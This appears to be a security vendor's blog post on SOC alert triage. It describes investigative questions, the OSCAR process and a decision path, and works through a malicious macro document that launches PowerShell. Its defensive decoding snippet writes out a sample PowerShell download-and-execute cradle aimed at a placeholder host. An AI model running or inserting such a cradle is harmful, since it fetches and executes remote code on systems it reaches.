OK, so you got an alert and you want to dig in. Where do you start? This article walks through how we investigate alerts at Expel and the best practices that shape our process.
Analysts have to approach every alert with the same mindset and process. They don’t know if the alert is malicious or benign when they start working. Their job is challenging enough; we don’t want them to have to reinvent an investigation process for each and every alert too.
So how do we make sure our SOC analysts are efficient and consistently make high-quality decisions?
That’s where the Expel Workbench managed alert process (MAP) comes in.
Goal – Answer the investigative questions for each alert.
Investigative process – "OSCAR" (which stands for orient, strategize, collect evidence, analyze and report) is how we answer those questions.
Decision path – How alerts move through our system as we investigate.
At Expel, we look at alerts across a diverse customer base on over 60 unique vendor technologies. There’s a lot of variety.
The good news for SOC analysts is that the goal, investigative process and decision path are consistent for every alert we review.
The image below shows how we refer to each of these things and provides a quick summary as well.
Attackers are creative. They evolve their methods, make decisions to evade detection and try to blend in.
In our experience, an investigative runbook containing a rote set of steps is inflexible in the face of change and removes thinking and analysis from the process, which sooner or later results in missed attacker activity (and attackers make sure it’s sooner).
We need to give SOC analysts the freedom to be creative when they need to be, while also providing guardrails to ensure each alert that we look at meets our standard of quality.
The questions-based investigative process forces analysts to rely on critical thinking skills to assess what is actually happening in the alert. This gives SOC analysts the space to analyze the activity and find novel attacker behaviors, and the flexibility to do it on the widest variety of alert signal.
During alert triage, our goal is to answer the question: what is this activity?
For every malicious event, we seek to answer all five investigative questions:
What is this activity?
Where is it?
When did it get here?
How did it get here?
What does the customer need to do?
The Expel transparent platform, Expel Workbench, allows customers to see what alerts were closed as benign and why.
We can’t get away with closing something benign without explaining why. Asking our SOC analysts to focus on describing the purpose of the activity the alert is associated with helps them close alerts more confidently. This also allows customers or other analysts to understand the analysis that led to that conclusion.
First, let’s cover the different ways an alert can travel through the system as SOC analysts answer the investigative questions.
This process breaks down into five buckets that map to the investigative questions.
Here’s exactly what our SOC analysts do during each phase of an investigation:
Triage – Based on the information at hand, the analyst attempts to determine whether the alert is benign (move to close) or malicious (move to incident). If the analyst needs more information to make a decision, they move the alert to a state called "investigate." In both the triage and investigate states, analysts use the OSCAR investigative process to answer the first investigative question: what is this activity?
Investigate – This is when we need more data to understand the activity. At this stage, Expel Workbench empowers the analyst to query any of the customer's integrated security technologies for additional information using "investigative actions." Investigative actions use the security devices' APIs to acquire and format additional data so the analyst can determine whether the activity is malicious or benign. They fall into two categories: query [indicator] and acquire [artifact]. Querying an indicator searches for it in process events, network events and so on. Examples of investigative actions are query IP, query domain, query file, acquire file, query host and query user. Analysts can also run any of our Ruxie automated actions, such as "triage a suspicious login" or "Google Drive audit triage."
Incident – If we determine the activity is malicious, we declare a security incident and answer the remaining investigative questions which focus on determining the scope of the compromise – what the compromise is, when it started and how many hosts are affected.
Close – If we determine the alert doesn't represent malicious activity, we close the alert from the triage stage or the investigation stage with a close category and a close reason. For example: Close Category – benign; Close Reason – No evidence of malicious activity was found. This activity is common in the environment and across our customer base, and is expected for this user’s role. This is a known good application.
Notify – If an analyst determines that the alert doesn't represent a compromise, but does represent interesting or potentially risky activity, they notify the customer and provide the rationale for notification.
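The investigate stage above describes investigative actions as named queries (query IP, query domain and so on) against device APIs. As a rough illustration of that idea — none of the names below are the real Expel Workbench interface, and the handlers return canned data where a real system would call a vendor's API — such a layer can be modeled as a dispatch table from action names to handlers:

```python
from typing import Callable, Dict

# Hypothetical stand-ins for calls to a security device's API; a real
# implementation would authenticate and query the vendor's endpoints.
def query_ip(ip: str) -> dict:
    return {"indicator": ip, "sources": ["process_events", "network_events"]}

def query_domain(domain: str) -> dict:
    return {"indicator": domain, "sources": ["network_events", "dns_events"]}

# Dispatch table: investigative action name -> handler.
ACTIONS: Dict[str, Callable[[str], dict]] = {
    "query ip": query_ip,
    "query domain": query_domain,
}

def run_action(name: str, value: str) -> dict:
    """Run a named investigative action against an indicator."""
    return ACTIONS[name](value)
```

Keeping actions behind a uniform name-to-handler mapping is what lets one triage workflow span many vendor technologies: the analyst asks for "query IP" and the platform worries about which API answers it.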
Anything that appears malicious is promoted to an incident; closed alerts and investigations that are not promoted to incidents are implicitly not malicious.
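The decision path can be sketched as a small state machine. The states and transitions below follow the five buckets described above; everything else (names, structure) is illustrative, not how Expel Workbench is actually built:

```python
from enum import Enum

class AlertState(Enum):
    TRIAGE = "triage"
    INVESTIGATE = "investigate"
    INCIDENT = "incident"
    CLOSE = "close"
    NOTIFY = "notify"

# Allowed moves per the decision path: triage can close, escalate, or
# request more data; investigate can close, escalate, or notify; the
# remaining states are terminal for a given alert.
TRANSITIONS = {
    AlertState.TRIAGE: {AlertState.INVESTIGATE, AlertState.INCIDENT,
                        AlertState.CLOSE, AlertState.NOTIFY},
    AlertState.INVESTIGATE: {AlertState.INCIDENT, AlertState.CLOSE,
                             AlertState.NOTIFY},
    AlertState.INCIDENT: set(),
    AlertState.CLOSE: set(),
    AlertState.NOTIFY: set(),
}

def move(current: AlertState, nxt: AlertState) -> AlertState:
    """Advance an alert along the decision path, rejecting illegal moves."""
    if nxt not in TRANSITIONS[current]:
        raise ValueError(f"illegal transition {current.value} -> {nxt.value}")
    return nxt
```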
The Expel investigative process is based on a similar process developed by Sherri Davidoff and Jonathan Ham, discussed in the book Network Forensics: Tracking Hackers through Cyberspace.
It’s an iterative process loosely based on the observe, orient, decide, act (OODA) loop and specifically tailored for cybersecurity investigations.
Expel augments this process with technology that helps analysts document their work and guide them toward the next step in the investigation.
It starts with an alert, which contains a set of information related to potentially malicious activity. The Expel Workbench provides a number of decision support tools to help analysts during this process – customer context, automated workflows, data enrichment and investigative actions.
As a transparent security platform, we notify the customer throughout this journey based on configurable customer preferences.
Our process looks like this:
Orient – Understand the purpose of the alert and the information available. We encourage analysts to answer the following four questions at this stage.
What is this alert looking for?
Where is this in an attack lifecycle (i.e., MITRE ATT&CK tactics)?
What context do I have?
What alert data do I have?
Strategize – Determine what additional questions need to be answered and where to look for the answers. Identify and prioritize what data is needed to answer the remaining investigative questions. Determine if you should involve additional resources or escalate to more senior members of the team.
Collect Evidence – Acquire and parse the highest priority data.
Analyze – Review the data to determine if you were able to answer the investigative questions: Does this answer what I want to know?
Report – Final summary of the investigation: This is what I know.
The OSCAR process is an iterative loop. As the analyst answers questions, they develop new questions and need to collect additional evidence until they are able to achieve the goal of answering our five investigative questions.
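That iterative loop can be sketched in a few lines of code. This is a toy model, not Expel's implementation: the question strings and the canned evidence source below are invented for illustration, standing in for real investigative actions.

```python
from typing import Callable, Dict, List

def oscar_loop(open_questions: List[str],
               collect: Callable[[str], dict],
               max_rounds: int = 10) -> Dict[str, dict]:
    """Iterate: strategize -> collect evidence -> analyze, until done."""
    answers: Dict[str, dict] = {}
    for _ in range(max_rounds):
        if not open_questions:            # goal reached: every question answered
            break
        question = open_questions.pop(0)  # strategize: take the top-priority question
        evidence = collect(question)      # collect evidence from the relevant source
        answers[question] = evidence      # analyze and record the finding
        # analyzing one answer often raises new questions to chase down
        open_questions.extend(evidence.get("new_questions", []))
    return answers

# Toy evidence source standing in for real investigative actions.
def collect(question: str) -> dict:
    canned = {
        "what is this activity?": {
            "finding": "PowerShell downloading a script",
            "new_questions": ["is the domain malicious?"],
        },
        "is the domain malicious?": {"finding": "no web presence in OSINT"},
    }
    return canned.get(question, {"finding": "unknown"})

answers = oscar_loop(["what is this activity?"], collect)
```

The key property is in the loop body: answering one question can append new ones, so the analysis keeps widening until the evidence runs out or the investigative questions are satisfied.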
The investigative questions (goal), decision path and investigative process don’t change on a per-technology or per-operating system basis, even though the techniques used by the attacker and the format of the evidence do change.
Let’s walk through the process for an alert on a Windows 10 workstation as an example.
Phishing emails containing malicious attachments are one of the most common ways users get compromised, so let’s take a look at how this all comes together for activity related to a macro-enabled document.
We’ll follow an alert through the decision path as we apply the Expel investigative process to answer the investigative questions, starting with: what is this activity?
The initial alert comes from a suspicious Microsoft Office suite process relationship.
What is the alert looking for?
An attacker tricking the user into opening a malicious Microsoft Office document that uses macros to spawn a scripting interpreter, which downloads and executes a malicious script.
Where is this in an attack lifecycle (i.e., MITRE ATT&CK tactics)? This maps to initial access (a phishing attachment) and execution (a macro spawning a scripting interpreter).
What context do I have?
Analytics in Expel Workbench tell us the alert doesn't fire often (fewer than once a day across all customers) and that it frequently leads to investigations and incidents. Additionally, Expel's machine learning algorithms focused on PowerShell arguments have increased the alert severity.
What alert data do I have?
We have the following in the alert itself: Asset Details, Process Details (Process Tree, Process Arguments, etc.), Network Connections, File Modifications and Registry Modifications.
We want to determine what questions we need to answer and what data we need to get those answers.
Is PowerShell reaching out to a website to download something? (Process Args)
Are the PowerShell arguments suspicious? (Process Args)
Is the domain suspicious/malicious? (Network Connections, Process Args, Open-source intelligence [OSINT])
Is the downloaded file suspicious/malicious? (File Writes, Network Connections, Packet capture [PCAP], Process Args, OSINT)
Is the document that spawned PowerShell suspicious? (File Information, File Listing, Network Traffic, PCAP data)
We prioritize the review of available evidence and, if necessary, the acquisition of additional evidence. The prioritized list for this alert would be process args, network connections and additional OSINT to evaluate domains and IPs.
In this investigation, the automated alert enrichment capabilities powered by our robot, Ruxie, have provided all required information in the alert details in Expel Workbench.
The PowerShell argument is heavily obfuscated. We need to decode it. Ruxie can handle all the decoding for this particular alert, and even disassembles the shell code.
Using a search engine to look up the arguments from the decoded payload, it’s easy to determine that the argument reads the shellcode into memory and executes it.
This spawns network connections to the host EXAMPLE[.]com.
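Ruxie automates the decoding here, but the most common case is worth seeing by hand: PowerShell's -EncodedCommand argument is base64 over a UTF-16LE string, so it decodes in two steps. The sample payload below is invented for illustration (it mirrors the downloader behavior in this alert):

```python
import base64

def decode_encoded_command(b64: str) -> str:
    # PowerShell's -EncodedCommand is base64 of a UTF-16LE encoded string.
    return base64.b64decode(b64).decode("utf-16-le")

# Round-trip a sample payload the way a malicious loader would encode it.
payload = "IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE.com/a')"
encoded = base64.b64encode(payload.encode("utf-16-le")).decode("ascii")
print(decode_encoded_command(encoded))
```

Heavier obfuscation (string concatenation, compression, shellcode loaders) needs more work than this, which is exactly why automating the tedious decoding steps frees the analyst to focus on what the payload does.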
Automation within Expel Workbench uses GreyNoise and IPinfo to evaluate the EXAMPLE[.]com domain against OSINT, and determines that it has no web presence and is not known in OSINT repositories.
Now we can answer the first question: what is this activity?
We’ve determined that a Microsoft Office document spawned a scripting interpreter (PowerShell) that connected to a suspicious site to download and execute an unknown script from memory. This is classic malicious downloader behavior – definitely bad.
On the decision path, this alert moves from the triage phase directly to an incident.
The process of moving the alert to an incident generates a notification for the customer. Time is of the essence for a malicious file, so we want to get them started on remediation even before we finish answering the rest of the investigative questions.
An example of the report we generate for this instance is below.
The job of a SOC/MDR analyst is uniquely challenging. They go up against motivated and talented adversaries who constantly change tactics and environments. Analysts have to be constant learners.
To foster creativity, we believe it’s important to define what the goal is, explain the stops on the journey, and provide a framework that enables consistently thorough investigations.
This process works well for our analysts, but that doesn't mean the Expel Workbench managed alert process is fail-safe. Applied improperly, it can still lead to pitfalls and human error.
That’s why training a talented group of analysts to make sophisticated decisions matters.